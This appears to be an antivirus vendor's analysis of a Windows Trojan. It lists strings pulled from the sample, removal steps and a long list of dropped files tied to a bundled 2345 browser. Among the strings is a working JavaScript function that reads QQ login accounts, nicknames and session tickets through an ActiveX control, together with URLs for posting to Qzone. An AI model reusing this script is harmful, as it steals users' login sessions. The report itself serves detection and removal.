KeyF7

KeyF6

KeyF5

KeyF4

KeyF3

KeyF2

KeyF1

KeyDOWNARROW

KeyUPARROW

KeyRIGHTARROW

KeyLEFTARROW

KeyRIGHTALT

KeyLEFTALT

KeyRIGHTCTRL

KeyLEFTCTRL

KeyRIGHTSHIFT

KeyLEFTSHIFT

KeyDELETE

KeyTILDA

KeyRCURLY

KeyPIPE

KeyLCURLY

KeyZ

KeyX

KeyW

KeyV

KeyU

KeyT

KeyS

KeyR

KeyQ

KeyP

KeyO

KeyN

KeyM

KeyL

KeyK

KeyJ

KeyI

KeyH

KeyG

KeyF

KeyE

KeyD

KeyC

KeyB

KeyA

KeyGRAVE

KeyUNDERSCORE

KeyCARETE

KeyRBRACKET

KeyBACKSLASH

KeyLBRACKET

KeyCZ

KeyCY

KeyCX

KeyCW

KeyCV

KeyCU

KeyCT

KeyCS

KeyCR

KeyCQ

KeyCP

KeyCO

KeyCN

KeyCM

KeyCL

KeyCK

KeyCJ

KeyCI

KeyCH

KeyCG

KeyCF

KeyCE

KeyCD

KeyCC

KeyCB

KeyCA

KeyAT

KeyQMARK

KeyGREATERTHEN

KeyEQUALS

KeyLESSTHEN

KeySEMICOLON

KeyCOLON

KeySLASH

KeyPERIOD

KeyDASH

KeyCOMMA

KeyPLUS

KeyASTERISC

KeyRBRACE

KeyLBRACE

KeyAMPERSAND

KeyPERCENT

KeyDOLLAR

KeyPOUND

KeyDQUOTE

KeyBANG

KeySPACE

KeyESCAPE

KeyENTER

KeyTAB

KeyBACKSPACE

\d3drm.dll

\dplayx.dll

\dsound.dll

\dinput.dll

\ddraw.dll

.PAVCOleException@@

.PAVCOleDispatchException@@

<meta http-equiv="content-type" content="text/html; charset=gb2312">

[193.138.244.231]

c:\%original file name%.exe

(*.*)

1.0.0.0

(hXXp://VVV.eyuyan.com)

6.0.0.7631

2345.com

]p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe

23456789

1, 0, 6, 6

- Skin.dll

sqb.2015cc.cc

%original file name%.exe_1152_rwx_10000000_0003E000:

`.rsrc

L$(h%f

SSh0j

msctls_hotkey32

TVCLHotKey

THotKey

\skinh.she

}uo,x6l5k%x-l h

9p%s m)t4`#b

e"m?c&y1`Ð<

SetViewportOrgEx

SetViewportExtEx

SetWindowsHookExA

UnhookWindowsHookEx

EnumThreadWindows

EnumChildWindows

`c%US.4/

!#$<#$#=

.text

`.rdata

@.data

.rsrc

@.UPX0

`.UPX1

`.reloc

hJK.ZH

O.qt0

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

SkinH_EL.dll

1, 0, 6, 6

- Skin.dll

³ÉÆ·.exe_1980:

.text

`.rdata

@.data

.rsrc

t$(SSh

~%UVW

u$SShe

atl.dll

wininet.dll

user32.dll

kernel32.dll

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

MsgWaitForMultipleObjects

&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

skey

hXXp://dwz.cn/Rsusk

#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm

qzreferrer=http://user.qzone.qq.com/

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

https

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

hXXps://

hXXp://

len = str.length; i < len;   i) hash  = (hash << 5)   str.charCodeAt(i);

var t = QZONE.FormSender;

if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {

var a = QZFL.string.trim(fm.action);

a  = (a.indexOf("?") > -1 ? "&": "?")   "g_tk="   QZFL.pluginsDefine.getACSRFToken();

fm.action = a

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

WINMM.dll

WS2_32.dll

VERSION.dll

GetProcessHeap

WinExec

KERNEL32.dll

GetKeyState

USER32.dll

GetViewportOrgEx

GDI32.dll

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

WININET.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

.PAVCException@@

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

VVV.dywt.com.cn

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

#include "l.chs\afxres.rc" // Standard components

(*.*)

1.0.0.0

(hXXp://VVV.eyuyan.com)

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   ³ÉÆ·.exe:1980
   2345Explorer.exe:2100
   2345Explorer.exe:304
   2345Explorer.exe:2108
   2345Explorer.exe:2072
   2345Explorer.exe:2364
   2345Explorer.exe:2116
   p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe:332
   2345explorer_k43181459.exe:1060
   2345explorer_k43181459.exe:140

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M96PUVS7\stat[1].gif (43 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BXX815CG\pic[1].gif (719 bytes)
   C:\³ÉÆ·.exe (5442 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZJVUCBW4\index[1].htm (5 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M96PUVS7\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GXKD4PCB\app[1].js (73 bytes)
   %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (203 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GXKD4PCB\desktop.ini (67 bytes)
   C:\2345explorer_k43181459.exe (70225 bytes)
   %Documents and Settings%\%current user%\Cookies\index.dat (1564 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BXX815CG\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GXKD4PCB\core[1].php (766 bytes)
   %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (214 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M96PUVS7\5star[1].gif (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZJVUCBW4\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BXX815CG\stat[1].php (1097 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZJVUCBW4\qb123456[1].htm (259 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~C.tmp (41 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\SmartUrl.data-journal (9464 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FavIcons.data (8168 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~7.tmp (39 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FavoritesUpdate.data (29 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FavIcons.data-journal (4360 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\2345王牌软件\2345王牌浏览器\2345王牌浏览器.lnk (1 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\CrashUrl.data (2736 bytes)
   %Documents and Settings%\%current user%\Start Menu\Programs\2345王牌软件\2345王牌浏览器\卸载2345王牌浏览器.lnk (1 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\2345王牌软件\2345王牌浏览器\卸载2345王牌浏览器.lnk (1 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\Download.data-journal (5636 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\Setting.cfg (29 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\StartPageConfig.data (408 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\2345Explorer.hzv (8 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\History.data (16688 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\FormData.data (29 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\StartPageConfig.data-journal (532 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~9.tmp (41 bytes)
   %Documents and Settings%\%current user%\Start Menu\Programs\2345王牌软件\2345王牌浏览器\2345王牌浏览器.lnk (1 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\History.data-journal (12016 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\CrashUrl.data-journal (1808 bytes)
   %Documents and Settings%\%current user%\Desktop\2345王牌浏览器.lnk (1 bytes)
   %Documents and Settings%\%current user%\Start Menu\2345王牌浏览器.lnk (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~8.tmp (41 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\OnlineFav.data (29 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\2345王牌浏览器.lnk (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~A.tmp (453 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345Explorer\RT~B.tmp (501 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\Statistics.data (29 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\RCPackagesDb.data (4 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\IE8Core.data (4 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345explorer_k43181459.exe (1141284 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345NecessaryPackages.ini (287 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\2345pcsafe_k43181459.exe (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\~HJ1.tmp (313 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\p7_k43181459_ihaJ6SGgL6cCje0drNf3dVQQJKJP.exe (111954 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\retry_banner2.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\switch_combar_icon1.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_yahoo.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\8FDEAD446A8D607C20207D38D669E349.ico (894 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\zoom.js (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_01_1366.jpg (2392 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_xduote.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_background.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gtaobao.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\list_bg.png (2 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\1860F34853BBC50F66BF81B679989830.ico.jpg (778 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon3.gif (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_button_bg3.png (580 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\6E086A7049DD129DF69051413AC6AB3A.ico (1 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\6E086A7049DD129DF69051413AC6AB3A.ico.jpg (764 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gpaipai.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bg_search.png (510 bytes)
   %Program Files%\2345Soft\2345Explorer\Skins\CoralIE.skn (27504 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\gradient_top.png (2 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\8FDEAD446A8D607C20207D38D669E349.ico (894 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\preview_plus.bmp (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\ai_taobao_big.jpg (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_dbaidu.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\malice.htm (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_close.gif (70 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gdangdang.png (11 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralUI2.dll (7386 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsr3.tmp (543342 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\ico_tt.gif (1 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\default_page.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralUI.dll (17629 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vbaidu.png (3 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\85131C29C8F7B398A345BD7F1A51DAB1.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralUpdate.dll (1742 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\icon_weather.png (7 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_isoso.png (14 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\OFLH.data (3312 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bigicon_sogou.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_bg1.gif (576 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_igoogle.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\sina_big.jpg (14 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\RCWidgetPlugin.dll (33536 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_google.png (784 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\private.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\coral_commom.js (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\qq_big.jpg (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_background.gif (625 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_blank.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_edit.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_isoso.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\8FDEAD446A8D607C20207D38D669E349.ico.jpg (738 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_sohu.gif (104 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_soso.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bg1.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_button_bg2.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\Skins\Growth.skn (27504 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_button_bg2.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gjingdong.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_wsoso.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\detail_btn.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon1.gif (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\sprite_0718.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_bj.gif (1 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\F2A7BED2A1035F9E4EC022B3ECA481A8.ico (318 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bigicon_soso.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search_sogou.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search_google.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item22.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\81C6AF03AC3E2B181DD99A3C1AFD1AA3.ico (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_baidu.gif (104 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_background.gif (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\switch_bj.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\btn_sprite.png (8 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_04_1366.jpg (3616 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_button3.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_sogo.gif (594 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_button_bg3.png (580 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_mbaidu.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\iconMap.png (1552 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\81C6AF03AC3E2B181DD99A3C1AFD1AA3.ico (2 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralDownload.dll (6331 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralApp.dll (1789 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_tit_hover2.gif (876 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon4_2.gif (1 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\recovery.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\css\incognito.css (5 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\index.js (11 bytes)
   %Program Files%\2345Soft\2345Explorer\2345ExplorerReg.exe (144 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_fenghuang.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\coral404.htm (8 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\search.htm (2 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\lg_sprite.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_soso.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\ico_360.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_mgoogle.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\quan.gif (63 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\all_search_icon_baidu.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\css\p_login.css (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\game2_big.jpg (13 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\3D6A8AC8F2013B0D7A1EA53076E96320.ico.jpg (768 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item_hover1.png (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_bottombar_report3.gif (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_igoogle.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_google.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_none.png (140 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_close2.gif (73 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\Users\Default\SystemUrl.data (5520 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\coral_myfav.js (10 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bigicon_google.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_xverycd.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_04.jpg (5520 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_xl_background1.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_wbaidu.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bigicon_google.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_wwiki.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\error\404_2.jpg (7 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_tit2.gif (818 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralRender.dll (1614 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_xxunlei.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_03_1366.jpg (3312 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gjingdong.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\DA3E6E24050AA14E8FD334F6DA0AE9F1.ico.jpg (776 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_edit_hover.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_blank_hover.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_dgoogle.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_03.bmp (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_remove_hover.gif (605 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_bing.png (12 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bigicon_sogou.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vtudou.png (13 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_mbaidu.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\css\search.css (12 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_button_bg1.png (543 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\coral_search.js (9 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralDb.dll (9606 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\1860F34853BBC50F66BF81B679989830.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\Skins\Pink.skn (42222 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\85131C29C8F7B398A345BD7F1A51DAB1.ico.jpg (768 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_button_bg1.png (543 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\retry_banner.png (15 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_02.bmp (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bg1.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_soso.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_google.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\informantCenter\closeA.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\Microsoft.VC80.CRT.manifest (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\add.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\coral_se.js (16 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\bdBG.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\sign_btnbg.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_bottombar_report.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\jquery.loadmask.js (1 bytes)
   %Program Files%\2345Soft\2345Explorer\Addon\Capture.addon (11344 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\81C6AF03AC3E2B181DD99A3C1AFD1AA3.ico.jpg (762 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_mgoogle.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\icon_news.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon4.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\fancybox\jquery.fancybox-1.3.4.js (7 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\pop_edit.html (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\close_tab2.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_ibaidu.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\detail_bg.png (4 bytes)
